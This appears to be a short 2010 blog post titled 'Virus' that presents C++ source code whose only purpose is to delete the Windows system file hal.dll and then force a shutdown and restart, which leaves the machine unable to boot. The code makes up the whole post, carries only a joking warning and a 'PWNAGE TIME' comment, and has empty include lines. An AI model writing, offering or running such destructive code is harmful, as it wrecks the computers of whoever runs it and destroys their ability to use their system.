Tuesday, December 28, 2010

Virus ::: Do not try this on your home computer

The Original Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

No comments:

Post a Comment